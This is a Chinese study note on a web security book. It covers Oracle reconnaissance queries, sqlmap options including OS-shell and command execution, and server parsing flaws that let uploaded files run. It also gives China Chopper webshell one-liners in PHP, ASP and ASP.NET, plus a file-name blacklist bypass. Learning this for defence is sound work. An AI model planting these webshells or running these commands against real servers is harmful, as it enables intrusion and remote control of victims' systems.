《web安全深度剖析》笔记三

Oracle获取敏感信息：

当前用户权限：select * from session roles

当前数据库版本：select banner from sys.v.$versionwhere rownum=1

服务器出口IP：用utl_http.request可以实现

服务器监听IP：selectutl.inaddr_get_host_address from dual

服务器操作系统：select instance_name fromv$instance

当前连接用户：select SYS_CONTEXT (‘USERENV’,’CURRENT_USER’)from dual

 

Oracle 包可以分为两部分，一部分是包的规范，相当于JAVA的接口，另一部分是包体，相当于java里接口的实现类，实现了具体的操作

 

SQLMAP参数

测试注入点权限

--privileges //测试所有用户权限

--privileges –U sa //测试sa用户权限

 

指向shell命令

--os –cmd ==”net user” //执行net user命令

--os-shell //系统交互的shell

 

获取当前数据库名称

--current-db

 

执行SQL命令

--sql-shell//返回sql交互的shell,可以执行sql语句

--sql-query=”sql”

 

 

POST提交方式

--data “POST参数”

显示详细的等级

--dbs –v

(-v参数包含以下7个等级：

0：只显示python的回溯、错误和关键信息

1：显示信息和警告消息

2：显示调试消息

3：有效载荷注入

4：显示http请求头

5：显示http响应头

6：显示http响应的内容）

 

注入http请求

-r head.txt –dbs //http.txt为http请求内容

 

直接连到数据库：

-d“mysql://admin:admin@192.168.1.8:3306/testdb” –dbs

 

注入等级

--level 3

 

(sqlmap提供了“*“参数，将sql语句插入到指定位置，这一用法常用于伪静态注入

 

使用sqlmap插件

-tamper “space2morehash.py”

 

防御数字型注入，只需在程序中严格判断数据类型，如用is_numeric()_(type?_digit()来判断

 

第六章、上传漏洞

 

上传漏洞通常会与容器的解析漏洞配合在一起

常见的web容器有iis,nginx,apache,tomcat等

 

Iis6.0的2个漏洞：

1.     当建立*.asa,*.asp格式的文件夹时，其目录下的任意文件都将iis当作asp来解析

2.     当文件名为*.asp;1.jpg时，iis6.0同样会以asp脚本来解析

 

Apache漏洞

Apche解析文件时原则：碰到不认识的扩展名，则从后往前解析，若都不认识，则暴露源码

（WebDav,Web-based Distributed Authoring andVersioning）是基于http协议的通信协议，扩展了http协议，增加了put,move等方法）

 

Nginx是一款高性能的Web服务器，通常用来作为php的解析容器

 

Php cgi解析漏洞

在php配置文件中有一个关键的选项：cgi_fi:x_pathinfo,默认开启时，访问url   。。。、x.txt/x.php

x.php是不存在的文件，php向前递归解析，但是x.txt会按照php脚本来解析

 

中国菜刀常见木马：

Php :      <?php@eval ($_POST[‘chopper’];?>

Asp:        <%evalrequest(“chopper”)%>

Asp.net :        <%@PageLanguage=”Jscript”%><%eval(Request.Item[“chopper”],”unsafe”);%>

 

绕过黑名单：在windows系统下，如果文件名以“.”或者空格作为结尾，服务端接收文件名过后在写文件操作时，windows将会自动去除小数点和空格

 

MIME类型用来设定某种扩展文件名格式的打开方式，当具有该扩展名的文件被访问时，浏览器会自动使用指定的应用程序来打开